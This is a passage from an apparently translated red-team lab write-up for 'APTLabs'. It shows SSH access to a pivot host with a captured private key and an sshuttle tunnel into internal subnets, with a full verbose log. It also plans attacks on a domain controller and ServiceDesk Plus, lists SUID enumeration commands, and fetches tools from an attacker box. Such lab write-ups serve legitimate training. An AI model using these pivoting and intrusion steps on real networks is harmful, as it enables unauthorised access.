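    grep -cF -- "$blob" "$2/.ssh/authorized_keys" 2>/dev/null || true
}
```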

3. Verify the connection

  • Connect directly with the private key

    ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key sshuser@10.10.110.74

    ┌──(root㉿kali)-[~/Desktop/APTLabs]
    └─# ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key sshuser@10.10.110.74 
    
    Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-116-generic x86_64)
     System information as of Tue Apr  8 08:26:25 AM UTC 2025
      System load:  0.07               Processes:               282
      Usage of /:   78.3% of 12.22GB   Users logged in:         1
      Memory usage: 20%                IPv4 address for ens160: 192.168.20.31
      Swap usage:   0%
    Expanded Security Maintenance for Applications is not enabled.
    
    36 updates can be applied immediately.
    31 of these updates are standard security updates.
    To see these additional updates run: apt list --upgradable
    
    Last login: Tue Apr  8 08:23:38 2025 from 10.10.16.111
    sshuser@nextcloud:~$ 

3. Building a tunnel with sshuttle

  • sshuttle creates a transparent proxy tunnel

  • Similar to a VPN but lighter: it runs over an ordinary SSH session and needs only Python on the jump host; root (for iptables) is needed on the local side only

  • The listed subnets are forwarded through the jump host, so internal resources become reachable from the local machine

    # Install sshuttle
    apt install sshuttle

  • Bring up the tunnel

    sshuttle -r sshuser@10.10.110.74 192.168.20.0/24 192.168.21.0/24 -e 'ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key'

    What the command does:

  • -r sshuser@10.10.110.74: the remote jump host;

  • -e 'ssh -i nextcloud.key': the ssh command sshuttle uses, here with the nextcloud.key private key for passwordless login;

  • 192.168.20.0/24 192.168.21.0/24: the subnets forwarded through the jump host;

  • sshuttle inserts local iptables NAT rules (it does not add entries to the routing table) and runs a transparent proxy in the background.

  • "c : Connected to server." means the tunnel is up and the configuration is correct;
    from now on the local machine reaches 192.168.20.0/24 and 192.168.21.0/24 as if it were on the internal network.

  • Verbose tunnel log

    ┌──(root㉿kali)-[~/Desktop/APTLabs]
    └─# sshuttle -vv -r sshuser@10.10.110.74 192.168.20.0/24 192.168.21.0/24 -e 'ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key'
    
    Starting sshuttle proxy (version 1.3.1).
    c : Starting firewall manager with command: ['/usr/bin/sshuttle', '-v', '-v', '--method', 'auto', '--firewall']
    fw: Starting firewall with Python version 3.12.7
    fw: which() found 'iptables' at /usr/sbin/iptables
    fw: which() found 'iptables' at /usr/sbin/iptables
    fw: ready method name nat.
    c : Using default IPv4 listen address 127.0.0.1
    c : IPv6 enabled: Using default IPv6 listen address ::1
    c : Method: nat
    c : IPv4: on
    c : IPv6: on
    c : UDP : off (not available with nat method)
    c : DNS : off (available)
    c : User: off (available)
    c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
    c :   (<AddressFamily.AF_INET: 2>, '192.168.20.0', 24, 0, 0)
    c :   (<AddressFamily.AF_INET: 2>, '192.168.21.0', 24, 0, 0)
    c : Subnets to exclude from forwarding:
    c :   (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
    c :   (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
    c : Trying to bind redirector on port 12300
    c : TCP redirector listening on ('::1', 12300, 0, 0).
    c : TCP redirector listening with <socket.socket fd=5, family=10, type=1, proto=0, laddr=('::1', 12300, 0, 0)>.
    c : TCP redirector listening on ('127.0.0.1', 12300).
    c : TCP redirector listening with <socket.socket fd=7, family=2, type=1, proto=0, laddr=('127.0.0.1', 12300)>.
    c : Starting client with Python version 3.12.7
    c : Connecting to server...
    c : which() found 'ssh' at /usr/bin/ssh
    c : executing: ['/usr/bin/ssh', '-i', '/root/Desktop/APTLabs/credentials/nextcloud.key', 'sshuser@10.10.110.74', '--', '/bin/sh -c \'P=python3; $P -V 2>/dev/null || P=python; exec "$P" -c \'"\'"\'import sys, os; verbosity=2; stdin = os.fdopen(0, \'"\'"\'"\'"\'"\'"\'"\'"\'rb\'"\'"\'"\'"\'"\'"\'"\'"\'); exec(compile(stdin.read(1785), \'"\'"\'"\'"\'"\'"\'"\'"\'assembler.py\'"\'"\'"\'"\'"\'"\'"\'"\', \'"\'"\'"\'"\'"\'"\'"\'"\'exec\'"\'"\'"\'"\'"\'"\'"\'"\')); sys.exit(98);\'"\'"\'; exit 97\'']
    c :  > channel=0 cmd=PING len=7 (fullness=0)
     s: Running server on remote host with /usr/bin/python3 (version 3.10.12)
     s: assembling 'sshuttle' (30 bytes)
     s: assembling 'sshuttle.cmdline_options' (85 bytes)
     s: assembling 'sshuttle.helpers' (4154 bytes)
     s: assembling 'sshuttle.ssnet' (5745 bytes)
     s: assembling 'sshuttle.hostwatch' (2564 bytes)
     s: assembling 'sshuttle.server' (4166 bytes)
     s: latency control setting = True
     s:  > channel=0 cmd=PING len=7 (fullness=0)
     s: auto-nets:False
     s:  > channel=0 cmd=ROUTES len=0 (fullness=7)
     s: Waiting: 1 r=[0] w=[1] x=[] (fullness=7/0)
     s:   Ready: 1 r=[] w=[1] x=[]
    c : Connected to server.
    c : Waiting: 2 r=[5, 7, 9] w=[9] x=[] (fullness=7/0)
    c :   Ready: 2 r=[9] w=[9] x=[]
    c : mux read: 15
    c : <  channel=0 cmd=PING len=7
    c :  > channel=0 cmd=PONG len=7 (fullness=7)
    c : mux wrote: 15/15
    c : mux wrote: 15/15
    c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=14/0)
     s: mux wrote: 15/15
     s: Waiting: 1 r=[0] w=[1] x=[] (fullness=7/0)
     s:   Ready: 1 r=[] w=[1] x=[]
     s: mux wrote: 8/8
     s: Waiting: 1 r=[0] w=[] x=[] (fullness=7/0)
    c :   Ready: 2 r=[9] w=[] x=[]
    c : mux read: 8
    c : <  channel=0 cmd=ROUTES len=0
    fw: Got subnets: [(2, 24, False, '192.168.20.0', 0, 0), (2, 24, False, '192.168.21.0', 0, 0), (2, 32, True, '127.0.0.1', 0, 0), (10, 128, True, '::1', 0, 0)]
    fw: Got nslist: []
    fw: Got ports: 12300,12300,0,0
    fw: Got udp: False, user: None, group: None, tmark: 0x01, sshuttle_pid: 8527
    fw: setting up.
    fw: setting up IPv6.
    fw: ip6tables -w -t nat -N sshuttle-12300
    fw: ip6tables -w -t nat -F sshuttle-12300
    fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
    fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
    fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
    fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
    fw: setting up IPv4.
    fw: iptables -w -t nat -N sshuttle-12300
    fw: iptables -w -t nat -F sshuttle-12300
    fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
    fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
    fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
    fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 192.168.20.0/24 -p tcp --to-ports 12300
    fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 192.168.21.0/24 -p tcp --to-ports 12300
    fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
    fw: which() could not find 'resolvectl' in /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools
    fw: which() could not find 'systemd-resolve' in /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools
    c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=14/0)
     s:   Ready: 1 r=[0] w=[] x=[]
     s: mux read: 30
     s: <  channel=0 cmd=PING len=7
     s:  > channel=0 cmd=PONG len=7 (fullness=7)
     s: <  channel=0 cmd=PONG len=7
     s: received PING response
     s: mux wrote: 15/15
     s: Waiting: 1 r=[0] w=[] x=[] (fullness=0/0)
    c :   Ready: 2 r=[9] w=[] x=[]
    c : mux read: 15
    c : <  channel=0 cmd=PONG len=7
    c : received PING response
    c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=0/0)
    

    Summary of the verbose log:

    Module                        Status
    🔐 SSH connection             connected to sshuser@10.10.110.74
    🐍 Remote Python interpreter  found and used /usr/bin/python3 (3.10.12)
    🔥 iptables configuration     192.168.20.0/24 and 192.168.21.0/24 added to the NAT REDIRECT rules
    🌐 IPv4 + IPv6                both enabled, redirector listening on port 12300
    📡 UDP / DNS                  off: UDP is unavailable with the nat method and --dns was not given, so only TCP is tunnelled
    🚫 Errors                     none: no error messages or disconnects in the log

    Note that sshuttle does not add 192.168.20.0/24 or 192.168.21.0/24 to the system routing table; ip route shows only the VPN (tun0) and LAN routes:

    ┌──(root㉿kali)-[~/Desktop/APTLabs]
    └─# ip route
    default via 192.168.100.2 dev eth0 proto dhcp src 192.168.100.100 metric 100 
    10.10.16.0/23 dev tun0 proto kernel scope link src 10.10.16.111 
    10.10.110.0/24 via 10.10.16.1 dev tun0 
    192.168.100.0/24 dev eth0 proto kernel scope link src 192.168.100.100 metric 100 
                                                                                                                                                                                     
    ┌──(root㉿kali)-[~/Desktop/APTLabs]
    └─# iptables -t nat -L -n -v
    
    Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
     pkts bytes target     prot opt in     out     source               destination         
        0     0 sshuttle-12300  all  --  *      *       0.0.0.0/0            0.0.0.0/0           
    
    Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain OUTPUT (policy ACCEPT 6 packets, 718 bytes)
     pkts bytes target     prot opt in     out     source               destination         
        1    52 sshuttle-12300  all  --  *      *       0.0.0.0/0            0.0.0.0/0           
    
    Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain sshuttle-12300 (2 references)
     pkts bytes target     prot opt in     out     source               destination         
        0     0 RETURN     tcp  --  *      *       0.0.0.0/0            127.0.0.1           
        0     0 REDIRECT   tcp  --  *      *       0.0.0.0/0            192.168.20.0/24      redir ports 12300
        0     0 REDIRECT   tcp  --  *      *       0.0.0.0/0            192.168.21.0/24      redir ports 12300
        0     0 RETURN     all  --  *      *       0.0.0.0/0            0.0.0.0/0            ADDRTYPE match dst-type LOCAL
    


    Instead, traffic is hijacked by the sshuttle-12300 NAT chain shown above: outbound TCP to the two subnets is REDIRECTed to the local redirector on port 12300, which carries it over the SSH session to the jump host. The RETURN for 127.0.0.1 and for dst-type LOCAL keeps local traffic out of the tunnel.

4. Tunnel maintenance

  • The lab machines are reset daily, so the tunnel has to be re-created each day

  • Script the tunnel setup instead of retyping it

  • Watch for subnet conflicts: if a lab subnet overlaps a network the attacker box already uses, the REDIRECT rule captures that local traffic as well

  • The tunnel carries TCP only: with the nat method UDP is unavailable (as the log shows) and ICMP is never forwarded, so ping through the tunnel does not work
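    Before re-creating the tunnel each day it pays to check that the lab subnets do not collide with anything the attacker box already routes, since sshuttle's REDIRECT rule captures all TCP to the listed prefixes, local LAN included. The following is an added example, not part of the original write-up, in bash: it parses the text of ip route, tests the requested subnets for overlap with plain shell arithmetic, and wraps the sshuttle invocation from above in a start_tunnel function that refuses to start on a conflict and daemonises with a pidfile. The pidfile path and the function names are the example's own assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): check the subnets you are
# about to hand to sshuttle against the local routing table before starting
# the tunnel, so a lab network that collides with your own LAN is caught
# before the REDIRECT rule swallows it.

# Dotted-quad -> 32-bit integer.
ip2int() {
    local IFS=.
    set -- $1
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# "a.b.c.d/n" -> "first last" (network and broadcast address as integers).
# A bare host address is treated as /32.
cidr_range() {
    local ip="${1%/*}" bits="${1#*/}" base mask
    case "$1" in */*) ;; *) bits=32 ;; esac
    base=$(ip2int "$ip")
    mask=$(( bits == 0 ? 0 : (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    echo "$(( base & mask )) $(( (base & mask) | (~mask & 0xFFFFFFFF) ))"
}

# cidrs_overlap A B: true if the two ranges share at least one address.
cidrs_overlap() {
    local a1 a2 b1 b2
    set -- $(cidr_range "$1") $(cidr_range "$2")
    a1=$1; a2=$2; b1=$3; b2=$4
    [ "$a1" -le "$b2" ] && [ "$b1" -le "$a2" ]
}

# conflicting_subnets ROUTE_TABLE SUBNET...: ROUTE_TABLE is the text of
# `ip route`. Prints one line per requested subnet that overlaps a locally
# routed prefix (the "default" line carries no prefix and is skipped) and
# returns 1 if there was any conflict.
conflicting_subnets() {
    local routes="$1" req lnet rc=0
    shift
    for req in "$@"; do
        for lnet in $(printf '%s\n' "$routes" | awk '$1 ~ /\// {print $1}'); do
            if cidrs_overlap "$req" "$lnet"; then
                echo "$req overlaps local $lnet"
                rc=1
            fi
        done
    done
    return $rc
}

# start_tunnel KEY HOST SUBNET...: refuse to start if a subnet collides,
# otherwise run sshuttle as a daemon with a pidfile (path is an assumption),
# so re-creating the tunnel after the daily reset is one command.
start_tunnel() {
    local key="$1" host="$2"
    shift 2
    conflicting_subnets "$(ip route)" "$@" || return 1
    sshuttle -D --pidfile /tmp/sshuttle.pid -r "$host" -e "ssh -i $key" "$@"
}
```

    Stop the daemon later with kill "$(cat /tmp/sshuttle.pid)"; sshuttle removes its iptables chain on exit.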

四. Going deeper into the internal network

1. Domain controller analysis

  • 192.168.20.10 (the DC) is the core target inside the network

  • Understand the domain's security structure before attacking it

  • Plan domain attacks such as Kerberoasting

2. Web service analysis

  • Analyse the web service on 192.168.20.15

  • Analyse ManageEngine ServiceDesk Plus on 192.168.21.123 for vulnerabilities

  • Research shows ServiceDesk Plus has known vulnerabilities; match the installed version against the advisories before choosing an exploit

3. Exploitation strategy

  • Research exploits for the services found

  • Prioritise critical business systems

  • Reproduce candidate vulnerabilities in a local environment first

4. Privilege escalation attempts

  • Linux kernel version: 5.15 (updated from 4.15.126)

  • Kernel exploits such as Dirty Pipe failed; the login banner shows 5.15.0-116-generic, which is long past the fixed kernels, so that is expected

  • Even when one route fails, keep trying other escalation methods

    # Check the kernel version
    uname -a
    
    # Find SUID binaries
    find / -perm -u=s -type f 2>/dev/null

五. Practical techniques and methodology

1. Thorough enumeration

  • Use several tools and techniques for information gathering

  • Do not skip details because there is a lot of output

  • Be aware of the privileges and system restrictions a tool needs

2. Attack path planning

  • Build the attack path from the information collected

  • Priority: domain controller > critical business systems > general resources

  • Keep a picture of the whole network topology

3. Think like the operations team

  • Consider the network architecture and security controls from an administrator's point of view

  • Look for patterns in IP allocation (for example the same host part reused across subnets)

  • Avoid damaging production systems

4. Tooling and build skills

  • Know how to compile and use the tools you need

  • Understand the advantage of statically linked binaries: they run on a target without matching shared libraries

  • Be wary of binaries compiled by others; they may carry more than advertised

5. File transfer

  • Use SCP to copy files over the existing SSH access

  • Use a lightweight web server to serve files (for example Go Simple HTTP Server)

  • Prefer encrypted channels to reduce the chance of detection

    # Fetch a tool from a simple HTTP server on the attacker box
    wget http://10.10.16.122/go-shs
    
    # Copy a file with SCP
    scp file.txt user@remote:/path/
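    Transferring a tool is only half the job: the warning above about binaries compiled by others applies just as much to a file that was truncated or swapped in transit. The following added example (bash; not from the original write-up) downloads from a simple HTTP server with wget or curl, compares the SHA-256 against the hash recorded on the build machine and discards the file on mismatch. The URL, expected hash and destination are parameters, and the test data is constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): download a tool and keep it
# only if its SHA-256 matches the value recorded on the build machine.
# Assumes coreutils sha256sum and either wget or curl.

# verify_sha256 FILE EXPECTED: 0 if FILE's SHA-256 equals EXPECTED (hex, any case)
verify_sha256() {
    local actual expected
    actual=$(sha256sum "$1" | awk '{print $1}')
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -n "$actual" ] && [ "$actual" = "$expected" ]
}

# keep_if_verified FILE EXPECTED: make FILE owner-executable if the hash
# matches, otherwise delete it and return 1 so a bad binary is never run.
keep_if_verified() {
    if verify_sha256 "$1" "$2"; then
        chmod 700 "$1"
        return 0
    fi
    echo "hash mismatch for $1, discarding" >&2
    rm -f "$1"
    return 1
}

# fetch_tool URL EXPECTED DEST: the page's `wget http://.../go-shs` with the
# verification step added. Falls back to curl when wget is absent.
fetch_tool() {
    local url="$1" expected="$2" dest="$3"
    if command -v wget >/dev/null 2>&1; then
        wget -q -O "$dest" "$url" || return 1
    else
        curl -sSf -o "$dest" "$url" || return 1
    fi
    keep_if_verified "$dest" "$expected"
}
```

    Record the hash with sha256sum on the machine where the tool was built, and pass it as the second argument: fetch_tool http://10.10.16.122/go-shs <hash> ./go-shs.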
    

6. Tunnelling and proxying

  • Understand the strengths and weaknesses of the different tunnelling techniques

  • Learn the logic and direction of port forwarding (local versus remote)

  • Know how to chain tunnels through several hops

This covers the key techniques of a red team engagement from gaining a foothold through internal information gathering and tunnel setup, and lays the groundwork for the domain attacks and privilege escalation that follow.
